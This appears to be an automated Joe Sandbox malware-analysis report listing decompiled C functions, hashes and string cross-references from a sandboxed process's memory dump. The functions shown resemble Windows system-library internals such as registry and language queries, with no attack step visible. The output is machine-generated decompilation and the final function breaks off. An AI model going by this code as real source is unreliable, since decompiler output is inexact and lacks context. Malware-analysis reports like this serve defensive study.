0x04d0a348
0x00000000
0x04d0a2f9
0x04d0a2d6
0x04d0a2da
0x00000000
0x00000000
0x00000000
0x04d0a2da
0x04cacde2
0x04cacde2

Strings

AlternateCodePage, xrefs: 04CACD9E

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: AlternateCodePage
API String ID: 0-3889302423
Opcode ID: 60c16e87ab1b4944c12ded1837c4310526559368efda720806e74c1cc2f94dfc
Instruction ID: 946ea5519fc05f0c9a4264c7f860ef4fe70d3ad56b3da97b5a74c921f028ce87
Opcode Fuzzy Hash: 60c16e87ab1b4944c12ded1837c4310526559368efda720806e74c1cc2f94dfc
Instruction Fuzzy Hash: 3641AF71E00209ABDF24DFD4C880AEEB7B9FF94714F14816AE511A7690E634AB41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CE41BB Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04CE41BB(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = L04CC58B0(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04CF2CE0();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04CF2E40();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04CF2A80();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xf11f201a
							_t109 = E04CC5D90(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002f11f
								E04CF88C0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002f11f
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04CF2A80();
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04ce41cf
0x04ce41d5
0x04ce41dc
0x04ce41e3
0x04ce41ee
0x04ce41f0
0x04ce41f4
0x04ce41fc
0x04ce4204
0x04ce4209
0x04ce4211
0x04ce4212
0x04ce421b
0x04ce421f
0x04ce4220
0x04ce4228
0x04ce422c
0x04ce4230
0x04ce4239
0x04ce4240
0x04ce4247
0x04ce424e
0x04d22e52
0x04d22e52
0x04ce4254
0x04ce4254
0x04ce4256
0x04ce425c
0x04ce4261
0x04ce4262
0x04ce426b
0x04ce426f
0x04d22e49
0x04d22e49
0x04d22e4d
0x00000000
0x04ce4275
0x04ce4275
0x04ce4289
0x04ce428d
0x04d22e44
0x00000000
0x04ce4293
0x04ce4297
0x04ce429e
0x04ce42a5
0x04ce42ab
0x04ce42ae
0x04ce42b2
0x04ce42b5
0x04ce42bc
0x04ce42c0
0x04ce42d4
0x04ce42db
0x04ce42df
0x04ce42e2
0x04ce42e7
0x04ce42ea
0x04ce42f0
0x04ce430b
0x04d22e59
0x04d22e5d
0x04d22e6e
0x04d22e73
0x04ce4311
0x04ce4314
0x04ce4322
0x04ce4327
0x00000000
0x04ce4327
0x04ce42f2
0x04ce42f2
0x04ce42f5
0x04ce42f7
0x04ce42f7
0x04ce42f0
0x04ce428d
0x04ce426f
0x04ce424e
0x04ce42ff

Strings

@, xrefs: 04CE4220

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: 0188e2093247e39da17cf3e749cf9b356217594f457b69ea24556406de8214a8
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 8351AC71600710AFD320DF19C841A6BB7F9FF48714F00892EFA95976A0E7B4E914DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D6ADD6 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04D6ADD6(void* __ecx, intOrPtr __edx, char* _a4, short* _a8) {
				void* _v8;
				signed int _v12;
				char _v16;
				short _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				void* _t41;
				short _t52;
				char* _t57;
				void* _t64;
				short* _t68;
				void* _t75;
				void* _t77;
				void* _t78;

				_t77 = __ecx;
				_v24 = __edx;
				_v20 = 0;
				_t75 = 0;
				_v8 = 0xffffffff;
				if(__edx == 0 || __ecx == 0) {
					_t78 = 0xc000000d;
					goto L22;
				} else {
					_v12 = _v12 & 0;
					_v16 = 1;
					E04CF5050(0xffffffff,  &_v36, L"PreferredUILanguages");
					_push(0xffffffff);
					_t64 = __ecx;
					_t41 = E04CAD64A(__ecx,  &_v36,  &_v16, 0,  &_v12);
					if(_v12 == 0 || _t41 == 0xc0000034) {
						_t78 = 0xc0000001;
						goto L24;
					} else {
						_t75 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
						if(_t75 != 0) {
							_push(_t64);
							_t65 = _t77;
							_t78 = E04CAD64A(_t77,  &_v36,  &_v16, _t75,  &_v12);
							if(_t78 < 0) {
								L22:
								if(_t75 != 0) {
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t75);
								}
								goto L24;
							}
							if(_v16 == 1) {
								E04CF5050(_t65,  &_v36, _t75);
								if(E04CD56E0( &_v36,  &_v28) == 0) {
									goto L8;
								}
								_t52 = _v28;
								if(_t52 == 0x1000 || _t52 == 0x1400) {
									_t78 = E04CAD853( &_v20, _v24, _v32, 0,  &_v20);
									if(_t78 < 0) {
										goto L22;
									}
									_push(3);
									_pop(1);
									goto L15;
								} else {
									_v20 = _t52;
									L15:
									_t78 = E04CD4EDF(_v24, 1, _v20,  &_v8);
									if(_t78 >= 0) {
										_t57 = _a4;
										if(_t57 != 0) {
											 *_t57 = 2;
										}
										_t68 = _a8;
										if(_t68 != 0) {
											 *_t68 = _v8;
										}
									}
									goto L22;
								}
							}
							L8:
							_t78 = 0xc0000001;
							goto L22;
						} else {
							_t78 = 0xc0000017;
							L24:
							return _t78;
						}
					}
				}
			}

0x04d6ade0
0x04d6ade6
0x04d6adea
0x04d6adee
0x04d6adf3
0x04d6adf9
0x04d6af1a
0x00000000
0x04d6ae07
0x04d6ae07
0x04d6ae16
0x04d6ae19
0x04d6ae1e
0x04d6ae22
0x04d6ae2d
0x04d6ae35
0x04d6af13
0x00000000
0x04d6ae46
0x04d6ae59
0x04d6ae5d
0x04d6ae69
0x04d6ae6d
0x04d6ae7d
0x04d6ae81
0x04d6af1f
0x04d6af21
0x04d6af2f
0x04d6af2f
0x00000000
0x04d6af21
0x04d6ae8a
0x04d6ae9b
0x04d6aeaf
0x00000000
0x00000000
0x04d6aeb1
0x04d6aeb9
0x04d6aed9
0x04d6aedd
0x00000000
0x00000000
0x04d6aedf
0x04d6aee1
0x00000000
0x04d6aec2
0x04d6aec2
0x04d6aee2
0x04d6aef3
0x04d6aef7
0x04d6aef9
0x04d6aefe
0x04d6af00
0x04d6af00
0x04d6af03
0x04d6af08
0x04d6af0e
0x04d6af0e
0x04d6af08
0x00000000
0x04d6aef7
0x04d6aeb9
0x04d6ae8c
0x04d6ae8c
0x00000000
0x04d6ae5f
0x04d6ae5f
0x04d6af34
0x04d6af3a
0x04d6af3a
0x04d6ae5d
0x04d6ae35

Strings

PreferredUILanguages, xrefs: 04D6AE0F

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 1a140f61759f7ec5bc9f3306187c535b969a3ae6c4fda593a602410192443031
Instruction ID: 412a0718f601721bed547163daae9d458bc4a723960a12dbfa38ab62c1b9f502
Opcode Fuzzy Hash: 1a140f61759f7ec5bc9f3306187c535b969a3ae6c4fda593a602410192443031
Instruction Fuzzy Hash: F841B372A00219ABDF21DA94C840AEEB7BABF45714F05416BF953B7350E634EE40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04D2C3B0 Relevance: 1.4, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04D2C3B0(char* _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4dab370 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04CE4E50(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04D2C574(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04CF8F40( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04D2C3B0;
						E04CF8F40( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04D08940( &_v1072, _t75, _t79, _t80, _t81);
						E04D3A5E0(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04CF2C70();
					}
					return E04CF4B50(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04D2C7DD(_a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04D2C6F2(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04CF8F40( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04CF2B00();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04D2C5F5(_a4,  &_v352, _t80);
						}
					}
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04CF2A80();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04d2c3c2
0x04d2c3ca
0x04d2c3cd
0x04d2c3d6
0x04d2c3d7
0x04d2c3ee
0x04d2c3ff
0x04d2c411
0x04d2c415
0x04d2c4db
0x04d2c4db
0x04d2c4dd
0x04d2c4e2
0x04d2c4e9
0x04d2c4f5
0x04d2c4fd
0x04d2c50d
0x04d2c517
0x04d2c528
0x04d2c536
0x04d2c537
0x04d2c54c
0x04d2c551
0x04d2c557
0x04d2c559
0x04d2c559
0x04d2c571
0x04d2c571
0x04d2c425
0x04d2c430
0x04d2c434
0x00000000
0x00000000
0x04d2c43a
0x04d2c447
0x04d2c452
0x04d2c456
0x04d2c458
0x04d2c465
0x04d2c46a
0x04d2c473
0x04d2c474
0x04d2c479
0x04d2c47a
0x04d2c482
0x04d2c483
0x04d2c48e
0x04d2c492
0x04d2c498
0x04d2c49f
0x04d2c49f
0x04d2c4a6
0x04d2c4a8
0x04d2c4ab
0x04d2c4b2
0x04d2c4b2
0x04d2c4a6
0x04d2c4c7
0x04d2c4c7
0x04d2c4cc
0x04d2c4d2
0x04d2c4d9
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 04D2C3FF

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: fa57716c67ed12472e6b9e5259118d4941229294bd4608a36ae23040fec7f97e
Instruction ID: 48b42ac3fc4016de39ceba4044076a0cb8b8211b5fb35b992de144deab6f82d7
Opcode Fuzzy Hash: fa57716c67ed12472e6b9e5259118d4941229294bd4608a36ae23040fec7f97e
Instruction Fuzzy Hash: 164142B1D1052DAEEB61DA50CD84FEEB77DAB44718F0045E5EB08A7140DB34BE898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 04D466D0 Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04D466D0(void* __ecx, signed int _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				char _v112;
				char _v113;
				char _v120;
				signed int _v124;
				char* _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t35;
				signed char _t40;
				signed char _t46;
				intOrPtr _t49;
				void* _t55;
				signed char _t59;
				void* _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				signed int _t65;

				_v8 =  *0x4dab370 ^ _t65;
				_t35 = _a12;
				_t63 = _a4;
				_v128 = _t35;
				_t62 =  &_v112;
				 *_t35 = 1;
				if(_a8 != 0 || _t63 == 0) {
					_t36 = 0xc000000d;
				} else {
					_v113 = 0;
					_push( &_v120);
					_push(0x68);
					_push(_t62);
					_push(0x10);
					_push(_t63);
					_t55 = E04CF3F60();
					if(_t55 >= 0) {
						L7:
						_t40 =  *(_t62 + 2) & 0x0000ffff;
						_t59 = _t40;
						if((_t40 & 0x00000010) == 0) {
							L16:
							 *_v128 = 0;
						} else {
							_t63 =  *(_t62 + 0xc);
							if(_t59 < 0) {
								asm("sbb esi, esi");
								_t63 =  ~_t63 & _t63 + _t62;
							}
							if(_t63 != 0) {
								_v124 = _v124 & 0x00000000;
								while(1) {
									_t60 = E04CD7FD0(_t63, 0x11,  &_v124);
									if(_t60 == 0) {
										goto L16;
									}
									if(( *(_t60 + 1) & 0x00000008) != 0) {
										continue;
									} else {
										_t46 =  *((intOrPtr*)(_t60 + 9));
										if(_t46 != 0 &&  *((intOrPtr*)(_t60 + 0xc + (_t46 & 0x000000ff) * 4)) >= 0x2000) {
											goto L16;
										}
									}
									goto L17;
								}
							}
							goto L16;
						}
						L17:
						if(_v113 != 0) {
							goto L18;
						}
						goto L19;
					} else {
						if(_t55 == 0xc0000023) {
							_t49 =  *0x4da5d78; // 0x0
							_t62 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49 + 0x140000, _v120);
							if(_t62 != 0) {
								_v113 = 1;
								_push( &_v120);
								_push(0x68);
								_push(_t62);
								_push(0x10);
								_push(_t63);
								_t55 = E04CF3F60();
								if(_t55 < 0) {
									L18:
									E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
								} else {
									goto L7;
								}
								L19:
								_t36 = _t55;
							} else {
								_t36 = _t55 - 0xc;
							}
						}
					}
				}
				return E04CF4B50(_t36, _t55, _v8 ^ _t65, _t61, _t62, _t63);
			}

0x04d466df
0x04d466e6
0x04d466eb
0x04d466ef
0x04d466f2
0x04d466f5
0x04d466f8
0x04d467e0
0x04d46706
0x04d46709
0x04d4670d
0x04d4670e
0x04d46712
0x04d46713
0x04d46715
0x04d4671b
0x04d4671f
0x04d46770
0x04d46770
0x04d46774
0x04d46778
0x04d467bf
0x04d467c2
0x04d4677a
0x04d4677a
0x04d46780
0x04d46787
0x04d46789
0x04d46789
0x04d4678d
0x04d4678f
0x04d46793
0x04d4679f
0x04d467a3
0x00000000
0x00000000
0x04d467a9
0x00000000
0x04d467ab
0x04d467ab
0x04d467b0
0x00000000
0x00000000
0x04d467b0
0x00000000
0x04d467a9
0x04d46793
0x00000000
0x04d4678d
0x04d467c5
0x04d467c9
0x00000000
0x00000000
0x00000000
0x04d46721
0x04d46727
0x04d4672d
0x04d46749
0x04d4674d
0x04d4675a
0x04d4675e
0x04d4675f
0x04d46761
0x04d46762
0x04d46764
0x04d4676a
0x04d4676e
0x04d467cb
0x04d467d7
0x00000000
0x00000000
0x00000000
0x04d467dc
0x04d467dc
0x04d4674f
0x04d4674f
0x04d4674f
0x04d4674d
0x04d46727
0x04d4671f
0x04d467f3

Strings

#, xrefs: 04D46721

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: be1babf7e90d1656a78c72b8438a009787becbcdbdcd9fe7ef971ccab8e1b718
Instruction ID: d9d2074c982c534936b901f9884df1f5d52ab4c076c9117d5fa8d65321640e4e
Opcode Fuzzy Hash: be1babf7e90d1656a78c72b8438a009787becbcdbdcd9fe7ef971ccab8e1b718
Instruction Fuzzy Hash: 7931EB31A00759ABEB22DF68C854FEE77B9AF86B08F144068E9419B681D77DFC05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04D2C6F2 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04D2C6F2(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04CF2B00();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = E04CC5D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04CF2B00();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04d2c701
0x04d2c704
0x04d2c707
0x04d2c70d
0x04d2c70e
0x04d2c712
0x04d2c717
0x04d2c71a
0x04d2c71b
0x04d2c71c
0x04d2c71d
0x04d2c71f
0x04d2c722
0x04d2c729
0x04d2c72a
0x04d2c72b
0x04d2c732
0x04d2c736
0x04d2c738
0x04d2c738
0x04d2c743
0x04d2c7ac
0x04d2c7ae
0x04d2c7b0
0x04d2c7c0
0x04d2c7c2
0x04d2c7cf
0x04d2c7cf
0x04d2c7d5
0x04d2c7da
0x04d2c7da
0x04d2c7b5
0x04d2c7ba
0x00000000
0x04d2c7ba
0x04d2c758
0x04d2c75c
0x04d2c766
0x04d2c767
0x04d2c76d
0x04d2c76e
0x04d2c770
0x04d2c771
0x04d2c779
0x04d2c77d
0x04d2c7be
0x00000000
0x04d2c7be
0x04d2c783
0x04d2c78b
0x04d2c78b
0x04d2c790
0x04d2c794
0x00000000
0x04d2c796
0x04d2c799
0x04d2c799
0x04d2c7a3
0x04d2c7a5
0x04d2c7a5
0x00000000
0x04d2c7a3
0x04d2c794
0x04d2c75e
0x00000000

Strings

BinaryName, xrefs: 04D2C722

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 8a2d9d4246b1e83e5f7e859b55e3d7a2951c5a69058163196036045ab57ec569
Instruction ID: 6a5d5b88c63a9b2462166324e6c125b1ecf61285260a6113cbbb49c614daff55
Opcode Fuzzy Hash: 8a2d9d4246b1e83e5f7e859b55e3d7a2951c5a69058163196036045ab57ec569
Instruction Fuzzy Hash: 56313576910525BFEB26CA58CA45D6FB7B5FB91B28F014169E901A7250D730FE00D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4FB6 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CB4FB6(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L22:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L22;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x04cb4fbd
0x04cb4fc2
0x04cb4fc6
0x04d10531
0x04cb5005
0x04cb5009
0x04cb5009
0x04cb4fd2
0x04d1053b
0x00000000
0x04d1053b
0x04cb4fd8
0x04cb4fda
0x04cb4fdc
0x04cb4fdf
0x04cb4fe6
0x04cb5018
0x04cb5052
0x04cb5052
0x04cb4ff4
0x04cb4ffa
0x04cb4ffd
0x04cb4fff
0x04cb5001
0x04cb500f
0x04cb5011
0x04cb5011
0x04cb500f
0x04cb5003
0x00000000
0x04cb5003
0x04cb501d
0x04cb504c
0x04cb504e
0x00000000
0x04cb504e
0x04cb501f
0x04cb5022
0x04cb5024
0x04cb5026
0x00000000
0x00000000
0x00000000
0x04cb5028
0x04cb4fe8
0x04cb4fed
0x04cb502d
0x04cb5033
0x04cb5043
0x04cb5048
0x00000000
0x04cb5048
0x04cb5038
0x00000000
0x00000000
0x04cb503d
0x04cb5059
0x00000000
0x04cb5059
0x04cb503f
0x00000000
0x04cb4fef
0x04cb4fef
0x00000000
0x04cb4fef

Strings

Actx , xrefs: 04CB4FDF

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: eb182993881c61b3dedbae23009c77a6ad6d715ed9c475d8763cef57f19b19a8
Instruction ID: 8078be869cbf78085afa03ee43ba51b47652aaabba389293f859257d2d3f3404
Opcode Fuzzy Hash: eb182993881c61b3dedbae23009c77a6ad6d715ed9c475d8763cef57f19b19a8
Instruction Fuzzy Hash: 1F118130709A46ABEB394D0EB4406B6739BEB91328F2C053AE4D2CB391E671F94093C4

Uniqueness

Uniqueness Score: -1.00%

Function 04D30CEE Relevance: 1.3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04D30CEE(void* __ebx, intOrPtr __ecx, void* __edx, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t41;
				void* _t44;
				signed int _t45;

				_t38 = __edx;
				_t33 = __ebx;
				_t47 = (_t45 & 0xfffffff8) - 0x68;
